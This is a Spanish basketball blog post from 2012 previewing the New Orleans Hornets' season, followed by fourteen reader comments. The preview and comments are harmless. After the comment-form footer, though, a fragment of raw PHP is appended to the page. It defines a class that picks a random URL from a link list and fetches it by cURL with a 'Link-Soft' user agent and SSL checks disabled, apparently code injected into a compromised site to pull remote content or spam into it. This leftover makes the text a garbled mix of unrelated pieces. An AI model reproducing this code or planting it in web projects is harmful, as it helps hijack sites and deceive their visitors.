New Orleans Hornets: Buenos cimientos

30 de October de 2012 por Viva_Dirk

Tras una temporada realmente extraña con ‘Sternatos’, lesiones eternas y una cierta sensación de dejadez, los Hornets se presentan a esta campaña con varios motivos para la ilusión. Han elegido al Nº1 del draft, han renovado a Eric Gordon y adquirido a Ryan Anderson y aún han podido disponer de otra elección alta en el draft. Así que a pesar de no ser un equipo que aspire a grandes cotas sí hay motivos para estar pendientes de ellos. Hay ganas de ver a muchos de sus jugadores y qué color toma el equipo.

Tras la marcha de Jarrett Jack el camino ha quedado libre para Greivis Vásquez. El venezolano es un base realmente completo: puede defender bien, es un buen director, puede penetrar y por tamaño podría incluso postear, todo ello con una gran personalidad e inteligencia sobra la pista. Puede ser uno de los nombres de la temporada. El rookie Austin Rivers va a jugar indistintamente como base y escolta. Su juego es mucho más compatible con Vásquez, ya que se trata de un anotador de mucha clase y poco físico. Su misión va a ser la de aportar puntos desde el banquillo. No es mal papel para su primer año en la liga. 

Eric Gordon ha firmado un contrato de jugador franquicia pero… ¿lo es? A día de hoy seguro que no pero ya conocemos unas cuantas cosas de él: a sus 24 años ya ha promediado 22 puntos, ha demostrado ser un defensor aplicado, un gran tirador y un jugador competitivo, pero también sabemos que se ha perdido el 44% de los partidos de las 3 últimas campañas. Así pues, un Gordon sano puede ser uno de los mejores escoltas de la competición y una gran pieza para los Hornets. Un Gordon que se pierda 2 de cada 5 partidos va a ser un contrato descomunal para los Hornets. En la posición de escolta, además de Rivers, cuentan con otro joven jugador en el banco. Xavier Henry no ha tenido excesivas oportunidades hasta la fecha y va a tener que aprovechar cada minuto para ganarse un hueco.

Como alero titular parte Al-Farouq Aminu, clásico caso de jugador con gran físico e incapaz de anotar desde la larga distancia. Sus capacidades atléticas deben ser importante a la hora de establecer la defensa como el primer arma de este equipo y maximizarán su rendimiento a campo abierto. No tiene competencia alguna en el puesto así que lo que no haga este año difícilmente lo hará mas adelante.

Anthony Davis llega a la liga con un título NCAA en el bolsillo y habiendo sido escogido Nº1 del draft. A sus 19 años apunta desde ya a defensor legendario y no es para menos vista la agilidad con la que se mueve y lo aplicado que es tácticamente. Su liderazgo va a llegar desde su propia zona, y en ataque sus puntos deben aparecer en transiciones o en combinaciones donde pueda sacar ventaja de su velocidad. Su juego al poste es limitado y es muy posible que acabe jugando de center. El ex jugador de los Magic, Ryan Anderson, es uno de los candidatos a mejor sexto hombre de la temporada. Uno de los mejores triplistas de la liga, buen reboteador y un jugador muy inteligente sobre la cancha. Jugará los minutos decisivos como pareja interior de Davis.

Por algún motivo desconocido Robin Lopez vuelve a partir como titular en un equipo de la NBA. No hay mucho que describir: un tío de 2.13, sin juego al poste, sin tiro y sin capacidad de pase. Su función será meramente la de cargar el rebote ofensivo e interponer su cuerpo entre el center rival y la canasta. De largo, el titular más flojo del equipo. Jason Smith podría perfectamente quitarle tal privilegio, es mejor en todas las facetas aunque más débil físicamente.

Monty Williams ha demostrado ser un buen entrenador. Es muy joven y tiene un equipo aún más joven entre sus manos, así que bien podríamos estar hablando de una relación a largo plazo.

Quinteto: Vasquez-Gordon-Aminu-Davis-Lopez
Sexto hombre: Anderson

Pronóstico: 25-30 victorias. Buenos jugadores y buena situación salarial. Deberían empezar a funcionar como equipo desde ya para construir un equipo fuerte en un par de años.

Comenta

14 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Sabiendo que no tienen opciones de entrar en playoffs, al menos podremos disfrutar del trío Gordon-Davis-Anderson, con otros jugadores válidos como Vásquez y el resto un poco… ni fú ni fá. Claramente no tienen opciones de competir contra todo lo que se mueve por el Oeste. Lucharán por no ser farolillos rojos. Yo les veo en 30 victorias. Buen análisis Viva

      Citar

  2. txusma dice:
    #2

    Sospechoso Ryan Anderson hasta que no se demuestre lo contrario. Su vida sin Howard crea que será más difícil.

      Citar

  3. Viva_Dirk dice:
    #3

    El año pasado ya jugó mucho sin Howard. Es in jugadorazo Ryan Anderson.

      Citar

  4. Esteban dice:
    #4

    siento debilidad por Jason Smith, y seguramente sera el centro de este equipo cuando vean lo flojo q es lopez, Smith termina jugadas cerca del aro como pocos y juega con pasion, eso es mucho mas de lo que puede dar LOPEZ

    si salen con el de centro y consiguen un traspaso por un alero decente, pueden pelear PO

    rivers y anderson, forman una dupla desde el banco de las majores de la liga

      Citar

  5. HisRoyalAirness dice:
    #5

    Creo que Austin Rivers puede acabar comiéndole la tostada a Vasquez, aunque no creo que sea muy merecidamente. A Greivis se le ha menospreciado bastante en la liga.
    Anthony Davis apunta muy alto pero debe espabilar y mejorar desde ya su juego en el poste y no como Stoudamire, dentro de 10 años.
    Le veo unas hechurar muy del estilo Timmy-D (salvando mucho las distancias) y esos brazos enormes llegan a todo. Si saca un par de armas ofensivas podemos estar hablando de un jugador increíble.

    Gran análisis Viva

      Citar

  6. HisRoyalAirness dice:
    #6

    Por cierto, el pobre crío va a debutar ante el mismísimo “Big Fundamental”.

    Que vaya cogiendo la libreta

      Citar

  7. diestro dice:
    #7

    Anthony Davis me da la sensación de que tendrá que tirarse un año a base de solomillo, porque me da la impresión de falta de kilos para pegarse por dentro con los grandes interiores del oeste.

    No le he visto jugar demasiado así que seguro que me sorprende positivamente.

      Citar

  8. Laker1624 dice:
    #8

    HisRoyalAirness: Por cierto, el pobre crío va a debutar ante el mismísimo “Big Fundamental”.Que vaya cogiendo la libreta

    Si se luce en su debut ante un grande como Duncan igual le sirve para entrar en la liga por la puerta grande. Creo que jugar su primer partido oficial ante un jugador de la talla de Duncan debe ser todo un reto para Davis.

      Citar

  9. Laker1624 dice:
    #9

    Si Davis rinde al nivel que se le supone creo que puede formar una pareja temible con Gordon. Tambien pienso que Anderson ofrecera un buen rendimiento este año. Aunque no creo que nada de esto les de para llegar a Playoffs ni de lejos. Veo este año como un año de transicion, supongo que la progresion de Davis y las incorporaciones de cara a la proxima temporada marcaran el futuro mas inmediato de este equipo. Si se mueven bien en el mercado los veo la proxima temporada peleando por Playoffs.

      Citar

  10. Sancho88 dice:
    #10

    A mí Jason Smith me encanta, pero vamos a ver, tampoco veo tanta diferencia entre él y Robin, y de hecho, tampoco veo tan mal jugador a Robin. Cerca del aro es un tipo potente, que en defensa tampoco lo hace mal y si le busca Vásquez te va a aportar puntos fáciles cerca de la canasta. Para mí puede ser mejor Robin que Jason

      Citar

  11. nba dice:
    #11

    tic,tac, tic tac , ya queda menos para que empiece el espectaculo, yo a los Hornets les veo con potencial, pero hay tantos equipos con una situacion tan parecida por la cola de la conferencia que va a ser harto dificil que no esten peleando por no ser ultimos de conferencia

      Citar

  12. melo15 dice:
    #12

    Hoy empìeza la NBA?
    Sabeis si cuatro da algun partido?

      Citar

  13. Pop dice:
    #13

    melo15:
    Hoy empìeza la NBA?
    Sabeis si cuatro da algun partido?

    Melo hombre que estás en internet!

    http://www.laguiatv.com/programacion/

      Citar

  14. HisRoyalAirness dice:
    #14

    Puf, Ray Allen… miedito

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>